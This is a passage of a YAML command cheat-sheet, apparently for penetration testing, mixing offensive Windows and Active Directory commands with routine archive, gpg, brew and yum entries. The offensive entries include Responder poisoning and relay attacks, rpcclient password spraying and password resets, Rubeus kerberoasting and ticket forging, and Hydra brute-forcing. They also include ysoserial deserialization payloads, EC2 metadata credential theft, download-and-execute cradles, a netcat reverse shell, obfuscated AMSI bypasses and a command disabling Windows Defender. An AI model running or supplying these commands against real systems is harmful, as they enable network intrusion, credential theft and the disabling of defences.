||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Get all domain trust
|
||
- cmd: Get-DomainGroupMember -Identity "<group|Administrators>" -Domain <domain> -Recurse
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Get all members of a a given group
|
||
- cmd: Get-DomainUser -SPN -Domain <domain> | select name, samaccountname, serviceprincipalname
|
||
lang: ps1
|
||
tags: ad, windows, powerview
|
||
desc: Get list of kerberoastable users
|
||
- cmd: responder –I eth0
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder launch
|
||
- cmd: responder –I eth0 -A
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder launch - analyze mode (no poisoning)
|
||
- cmd: responder -I eth0 --wpad
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder launch with wpad file
|
||
- cmd: sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder http on
|
||
- cmd: sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder http off
|
||
- cmd: sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder smb on
|
||
- cmd: sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder smb off
|
||
- cmd: sed -i 's/Challenge =.*$/Challenge = <challenge>/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder challenge set
|
||
- cmd: sed -i 's/Challenge =.*$/Challenge = 1122334455667788/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'Challenge ='
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: responder challenge reset
|
||
- cmd: multirelay -t <ip> -u <user1> <user2>
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf)
|
||
- cmd: multirelay -t <ip> -u ALL
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: multirelay attack - all user (previous disable HTTP and SMB in Responder.conf)
|
||
- cmd: runfinger -i <network_range>
|
||
lang: sh
|
||
tags: responder, LLMNR, NBT-NS, Poisoning, man in the middle
|
||
desc: runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not.
|
||
- cmd: rpcclient <ip> -U "<user>%<password>" -c "enumdomusers; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - enumdomusers
|
||
- cmd: rpcclient <ip> -U "<user>%<password>" -c "srvinfo; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - srvinfo
|
||
- cmd: rpcclient <ip> -c "lookupnales <name>; wmic useraccount get name,sid; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - get user sid
|
||
- cmd: rpcclient <ip> -U "<user>%<password>" -c "querydominfo; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - querydominfo
|
||
- cmd: rpcclient <ip> -U "<user>%<password>" -c "getdompwinfo; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - getdompwinfo (password policy)
|
||
- cmd: rpcclient <ip> -U "<user>%<password>" -c "netshareenum; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - netshareenum (password policy)
|
||
- cmd: 'for u in `cat <file>`; do echo -n "user: $u " && rpcclient -U "$u%$u" -c "getusername; quit" <ip>; done'
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: Trying all username as password from list of users
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enum; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - enum (Enum commands list)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomains; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - enumdomains (Current domain)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "enumdomgroups; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - enumdomgroups (Enum Domain groups)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroup <RID>; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - querygroup (Enum Group Information)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "querygroupmem <RID>; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - querygroupmem (Enum Group Membership)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "queryuser <RID>; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - queryuser (Enumerate specific User/ computer information by RID)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "getusrdompwinfo <RID>; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - getusrdompwinfo (User password policies)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "lsaenumsid; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - lsaenumsid (Local Users LSA Enum SID)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "lookupsid <SID>; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - lookupsid (Local Users Lookup SID)
|
||
- cmd: rpcclient <ip> -U "<user>%<pass>" -c "setuserinfo2 <LOGIN> 23 '<NEWPASSWORD>'; quit"
|
||
lang: sh
|
||
tags: rpcclient, rpc, windows
|
||
desc: rpcclient - setuserinfo2 (Reset AD user password)
|
||
- cmd: '.\Rubeus.exe ptt /ticket:<ticket>'
|
||
lang: ps1
|
||
tags: pentest
|
||
desc: ticket from file
|
||
- cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<lhost>/Rubeus.exe'); $assem = [System.Reflection.Assembly]::Load($data);
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: load rubeus from powershell
|
||
- cmd: '[Rubeus.Program]::MainString("klist");'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: execute rubeus from powershell
|
||
- cmd: '.\Rubeus.exe monitor /interval:5 /filteruser:<machine_account>'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: monitor
|
||
- cmd: '.\Rubeus.exe ptt /ticket:<BASE64BLOBHERE>; .\Rubeus.exe asreproast /format:<AS_REP_response_format> /outfile:<output_hashes_file>'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: inject ticket from b64 blob
|
||
- cmd: '.\Rubeus.exe asreproast /user:<user> /domain:<domain_name> /format:<AS_REP_response_format> /outfile:<output_hashes_file>; .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: ASREPRoast specific user
|
||
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name>'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: Kerberoasting and outputting on a file with a specific format
|
||
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /rc4opsec'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: Kerberoasting while being "OPSEC" safe, essentially while not try to roast AES enabled accounts
|
||
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /aes'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: Kerberoast AES enabled accounts
|
||
- cmd: '.\Rubeus.exe kerberoast /outfile:<output_TGSs_file> /domain:<domain_name> /user:<user> /simple'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: Kerberoast specific user account
|
||
- cmd: '.\Rubeus.exe hash /user:<user> /domain:<domain_name> /password:<password>'
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: get hash
|
||
- cmd: .\Rubeus.exe dump
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: dump - will dump any relevant cached TGS ticket’s stored
|
||
- cmd: '.\Rubeus.exe asktgt /user:<user> /domain:<domain_name> /rc4:<ntlm_hash> /ptt'
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: ask and inject ticket
|
||
- cmd: '.\Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<user> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /ptt'
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: S4U - with ticket - Constrained delegation
|
||
- cmd: '.\Rubeus.exe s4u /user:<user> /rc4:<NTLMhashedPasswordOfTheUser> /impersonateuser:<user_to_impersonate> /msdsspn:ldap/<domain_fqdn> /altservice:cifs /domain:<domain_name> /ptt'
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: S4U - with hash - Constrained delegation
|
||
- cmd: '.\Rubeus.exe hash /password:<machine_password>'
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: get rc4 of machine with the password
|
||
- cmd: '.\Rubeus.exe s4u /user:<MachineAccountName> /rc4:<RC4HashOfMachineAccountPassword> /impersonateuser:<user_to_impersonate> /msdsspn:cifs/<domain_fqdn> /domain:<domain_name> /ptt'
|
||
lang: sh
|
||
tags: ad, windows, rubeus
|
||
desc: S4U - Resource based constrained delegation
|
||
- cmd: $data = (New-Object System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe') ; $assem = [System.Reflection.Assembly]::Load($data); [Rubeus.Program]::Main("<rubeus_cmd>".Split())
|
||
lang: ps1
|
||
tags: ad, windows, rubeus
|
||
desc: Rubeus Reflection assembly
|
||
- cmd: 7z a <archive_name>.7z -p<password> <file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: 7z create archive with password
|
||
- cmd: binwalk -Me <firmware_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Recursively extract files from a firmware
|
||
- cmd: binwalk -E <firmware_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Compute entropy of a firmware
|
||
- cmd: gzip <path>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Compress file and appends .gz to its name
|
||
- cmd: gzip -d <gz_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Decompress compressed file
|
||
- cmd: rar a <dir>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Compress dir to rar file
|
||
- cmd: unrar x <file>.rar
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Decompress rar file
|
||
- cmd: tar cf <name>.tar <files>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Create a tar containing files
|
||
- cmd: tar xf <tar_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Extract the files from a tar
|
||
- cmd: tar czf <name>.tar.gz <files>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Create a tar with Gzip compression
|
||
- cmd: tar xzf <targz_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Extract a tar using Gzip
|
||
- cmd: unblob <firmware_file>
|
||
lang: sh
|
||
tags: archive
|
||
desc: Extract files from a firmware
|
||
- cmd: unblob --show-external-dependencies
|
||
lang: sh
|
||
tags: archive
|
||
desc: Show external dependencies
|
||
- cmd: zip <file>.zip <files_to_zip>
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: create zip file
|
||
- cmd: zip <file>.zip *
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: zip all the files of current directory
|
||
- cmd: zip -r <file>.zip <folder>
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: zip folder
|
||
- cmd: zip -u <file>.zip <file_to_add>
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: add file to a zip archive
|
||
- cmd: zipinfo <file>.zip
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: view zip content
|
||
- cmd: zip --symlinks <file>.zip <symlink_file>
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: create zip file with symlink (useful for path traversal)
|
||
- cmd: unzip -Z <file>.zip
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: list detailed zip file content
|
||
- cmd: unzip <file>.zip
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: unzip file
|
||
- cmd: unzip <file>.zip -d <destination_folder>
|
||
lang: sh
|
||
tags: archive, compress
|
||
desc: unzip file to directory
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> ssh
|
||
lang: bash
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - userlist and password list - 22
|
||
- cmd: hydra -l <user|root> -p <password|root> <ip> ssh
|
||
lang: bash
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - user and password - 22
|
||
- cmd: hydra -L <userlist> -e s <ip> ssh
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - user=password - 22
|
||
- cmd: hydra -l <user|root> -e n <ip> ssh
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - null password - 22
|
||
- cmd: hydra -L <userlist> -e r <ip> ssh
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - password=reverseuser - 22
|
||
- cmd: hydra -t 4 -s <port> -C <file_login_pass> <ip> ssh
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - ssh - file "login:pass" format - specify port
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> ftp
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - ftp - 21
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> smb
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - smb - 445
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> mysql
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - mysql - 3306
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> vnc
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - vnc - 5900
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> postgres
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - postgres - 5432
|
||
- cmd: hydra -L <userlist> -P <passlist> <ip> telnet
|
||
lang: sh
|
||
tags: bruteforce, access
|
||
desc: Hydra - telnet - 23
|
||
- cmd: cewl -w <file|wordlist.txt> -d <deep|3> -m <min_word_size|5> <url>
|
||
lang: bash
|
||
tags: wordlist, bruteforce, dict
|
||
desc: cewl - wordlist creation
|
||
- cmd: crunch <min|2> <max|8> 0123456789ABCDEF -o <output.txt>
|
||
lang: bash
|
||
tags: wordlist, bruteforce, dict
|
||
desc: crunch - generate wordlist hex
|
||
- cmd: crunch <min> <max> -f /usr/share/crunch/charset.lst <charset|mixalpha-numeric> -o <output.txt>
|
||
lang: bash
|
||
tags: wordlist, bruteforce, dict
|
||
desc: crunch - generate wordlist charset
|
||
- cmd: crunch 8 8 -t <pattern|,@@@%%%^> -o <output.txt>
|
||
lang: bash
|
||
tags: wordlist, bruteforce, dict
|
||
desc: crunch - generate wordlist Upper(,) lower(@)x3 numeric(%)x3 special(^)x1
|
||
- cmd: crunch 8 8 -t password%%^ -o <output.txt>
|
||
lang: bash
|
||
tags: wordlist, bruteforce, dict
|
||
desc: crunch - generate wordlist contain "password", 2 numbers and 1 special char
|
||
- cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||
lang: sh
|
||
tags: aws
|
||
desc: SSRF in EC2 - List roles
|
||
- cmd: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
|
||
lang: sh
|
||
tags: aws
|
||
desc: SSRF in EC2 - Dump roles
|
||
- cmd: gpg --version
|
||
lang: sh
|
||
tags: gpg
|
||
desc: gpg version
|
||
- cmd: gpg --gen-key
|
||
lang: sh
|
||
tags: gpg
|
||
desc: gpg generate key
|
||
- cmd: gpg --list-keys
|
||
lang: sh
|
||
tags: gpg
|
||
desc: list keys
|
||
- cmd: gpg --keyserver <key_server> --send-keys <public_key>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: distribute public key to key server
|
||
- cmd: gpg --output <filename_gpg> --export <key_name>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: export public key
|
||
- cmd: gpg --import <filename_gpg>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: import public key
|
||
- cmd: gpg --output <output_filename_gpg> --encrypt --recipient <public_key> <input_filename>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: encrypt document
|
||
- cmd: gpg --output <filename> --decrypt <filename_gpg>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: decrypt document
|
||
- cmd: gpg --output <filename_sig> --sign <filename>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: make a signature
|
||
- cmd: gpg --output <filename> <filename> --decrypt <filename_sig>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: verify signature
|
||
- cmd: gpg --clearsign <filename>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: clearsign documents
|
||
- cmd: gpg --output <filename_sig> --detach-sig <filename>
|
||
lang: sh
|
||
tags: gpg
|
||
desc: detach signature
|
||
- cmd: redis-cli
|
||
lang: bash
|
||
tags: databases
|
||
desc: connect to the local server
|
||
- cmd: redis-cli -h <ip> -a <password>
|
||
lang: bash
|
||
tags: databases
|
||
desc: connect to a remote server on the default port (6379)
|
||
- cmd: redis-cli -h <ip> -p <port> -a <password>
|
||
lang: bash
|
||
tags: databases
|
||
desc: connect remotely specifying a port
|
||
- cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem>
|
||
lang: bash
|
||
tags: databases
|
||
desc: connect remotely over tls w/ server certificate
|
||
- cmd: redis-cli -h <ip> --tls --cacert <redis_cert_path.pem> --cert <redis_user_path.crt> --key <redis_user_private_path.key>
|
||
lang: bash
|
||
tags: databases
|
||
desc: connect remotely over tls w/ server & client certificates
|
||
- cmd: java -jar ysoserial.jar <lib_payload> 'powershell.exe -EncodedCommand <base64_encoded_command>' > <output_file>
|
||
lang: bash
|
||
tags: java, unserialize
|
||
desc: ysoserial java - generate payload
|
||
- cmd: iconv -f ASCII -t UTF-16LE <file_to_convert> | base64 | tr -d "\n"
|
||
lang: bash
|
||
tags: java, unserialize
|
||
desc: convert file to base64 one line
|
||
- cmd: ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -EncodedCommand <base64_encoded_command>" --path="<asp_file_webroot_relative_path>" --apppath="<application_path_webroot_relative>" --decryptionalg="3DES" --decryptionkey="<decryption_key>" --validationalg="SHA1" --validationkey="<validation_state>"
|
||
lang: ps1
|
||
tags: .net, unserialize
|
||
desc: ysoserial.net - generate payload VIEWSTATE
|
||
- cmd: ysoserial.exe -f <lib|Json.Net> -g <gadget|ObjectDataProvider> -o raw -c "<command|calc.exe>" -t
|
||
lang: ps1
|
||
tags: .net, unserialize
|
||
desc: ysoserial.net - calc.exe payload for Json.Net using ObjectDataProvider gadget.
|
||
- cmd: bitsadmin /Transfer myJob http://<ip>/<file|file.txt> <path|C:\windows\temp>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: file with bitsadmin
|
||
- cmd: certutil.exe -urlcache -split -f http://<server>/<source_file> <dest_file>
|
||
lang: sh
|
||
tags: windows, certutil
|
||
desc: download with certutil
|
||
- cmd: certutil.exe -verifyctl -f -split h http://<server>/<source_file> <dest_file>
|
||
lang: sh
|
||
tags: windows, certutil
|
||
desc: download with certutil (2)
|
||
- cmd: certutil -decode enc.txt <file>
|
||
lang: sh
|
||
tags: windows, certutil
|
||
desc: Encode in base64 with certutil
|
||
- cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "(New-Object System.Net.WebClient).DownloadFile('http://<server>/<source_file>','<dest_file>')"
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Download with powershell
|
||
- cmd: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile New-Object System.Net.WebClient.DownloadFile('<url_file>','nc.exe'); nc.exe <ip> <port> -e cmd.exe
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Download and execute with powershell
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<ip>/<script>') | IEX
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Download cradle
|
||
- cmd: Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get file in trash
|
||
- cmd: Get-Process
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get process
|
||
- cmd: '[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://<ip>/<url>")'
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get Proxy
|
||
- cmd: $ExecutionContext.SessionState.LanguageMode
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get language mode
|
||
- cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}; $g=$f.GetValue($null); [IntPtr]$ptr=$g; [Int32[]]$buf = @(0); [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Bypass AMSI with _amsiContext_ (powershell only)
|
||
- cmd: $a=[Ref].Assembly.GetTypes(); Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static'); Foreach($e in $d) {if ($e.Name -like "*InitFailed") {$f=$e}}; $f.SetValue($null,$true)
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Bypass AMSI with _AmsiInitFailed_ (powershell only)
|
||
- cmd: $ZQCUW = @"; using System; ; using System.Runtime.InteropServices; ; public class ZQCUW {; [DllImport("kernel32")]; public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); ; [DllImport("kernel32")]; public static extern IntPtr LoadLibrary(string name); ; [DllImport("kernel32")]; public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); ; }; "@; Add-Type $ZQCUW; $BBWHVWQ = [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('a m s i . d l l '))"); $XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('A m s i S c a n B u f f e r '))"); $p = 0; [ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p); $TLML = "0xB8"; $PURX = "0x57"; $YNWL = "0x00"; $RTGX = "0x07"; $XVON = "0x80"; $WRUD = "0xC3"; $KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Bypass AMSI by patching (work for .NET binaries too)
|
||
- cmd: Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Verify PPL
|
||
- cmd: Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Verify application whitelisting
|
||
- cmd: ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: show forest trust
|
||
- cmd: Get-DomainTrust -Domain <domain>
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get domain trust
|
||
- cmd: Get-DomainSID -domain <sid>
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: Get domain SID
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/HostRecon.ps1') | IEX; Invoke-HostRecon
|
||
lang: sh
|
||
tags: powershell, download
|
||
desc: hostrecon
|
||
- cmd: (new-object system.net.webclient).downloadstring('http://<lhost>/PrivescCheck.ps1') | IEX; Invoke-PrivescCheck
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: privesccheck
|
||
- cmd: '[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname'
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: powershell view assemblies
|
||
- cmd: $proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: powershell get proxy address
|
||
- cmd: '[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://<proxaddress|$proxyAddr>")'
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: powershell set proxy
|
||
- cmd: pwsh -Command '$text = "(New-Object System.Net.WebClient).DownloadString(''http://<lhost>/<file>'') | IEX"; $bytes = [System.Text.Encoding]::Unicode.GetBytes($text); $EncodedText = [Convert]::ToBase64String($bytes); $EncodedText'
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: powershell - generate base64 encoded payload download runner
|
||
- cmd: Set-MpPreference -DisableRealtimeMonitoring $true
|
||
lang: ps1
|
||
tags: powershell, download
|
||
desc: powershell - disable Real Time Monitoring (Windows Defender)
|
||
- cmd: python -m SimpleHTTPServer <lport>
|
||
lang: bash
|
||
tags: server
|
||
desc: python Simple HTTP server
|
||
- cmd: python3 -m http.server <lport>
|
||
lang: bash
|
||
tags: server
|
||
desc: python3 Simple HTTP server
|
||
- cmd: php -S 0.0.0.0:<lport>
|
||
lang: sh
|
||
tags: server
|
||
desc: php Simple builtin server
|
||
- cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Read from linux (e.g. Raspberry Pi)
|
||
- cmd: flashrom -p linux_spi:dev=<spidev>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Force read from linux (e.g. Raspberry Pi)
|
||
- cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Read from BusPirate
|
||
- cmd: flashrom -p buspirate_spi:dev=<buspirate>,spispeed=<spispeed> -r <output_file> -f -c <chipname>
|
||
lang: sh
|
||
tags: pentest
|
||
desc: Force read from BusPirate
|
||
- cmd: brew update
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: update brew
|
||
- cmd: brew upgrade
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: upgrade brew
|
||
- cmd: brew info <package>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: get info for a package
|
||
- cmd: brew cask info <casks>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: get info for a cask
|
||
- cmd: brew install <package>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: install a package
|
||
- cmd: brew cask install <casks>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: install a cask
|
||
- cmd: brew uninstall <installed>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: uninstall a package
|
||
- cmd: brew cask uninstall <caskinstalled>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: uninstall a cask
|
||
- cmd: brew edit <package>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: edit package
|
||
- cmd: brew cask edit <casks>
|
||
lang: sh
|
||
tags: mac, install
|
||
desc: edit cask
|
||
- cmd: yum list available
|
||
lang: sh
|
||
tags: yum
|
||
desc: List all available packages
|
||
- cmd: yum list installed
|
||
lang: sh
|
||
tags: yum
|
||
desc: List all installed packages
|
||
- cmd: yum info <package-name>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Info about package
|
||
- cmd: yum search <query>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Search in repository (packages and descriptions)
|
||
- cmd: yum history list
|
||
lang: sh
|
||
tags: yum
|
||
desc: List all history actions (install, update and erase)
|
||
- cmd: yum check-update
|
||
lang: sh
|
||
tags: yum
|
||
desc: Check updates for installed packages
|
||
- cmd: yum update
|
||
lang: sh
|
||
tags: yum
|
||
desc: Update all packages
|
||
- cmd: yum update <package-name>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Update specific/individual package
|
||
- cmd: yum downgrade <package-name>
|
||
lang: sh
|
||
tags: yum
|
||
desc: Downgrade package
|
||
- cmd: yum install <package-name>
|
||
lang: sh
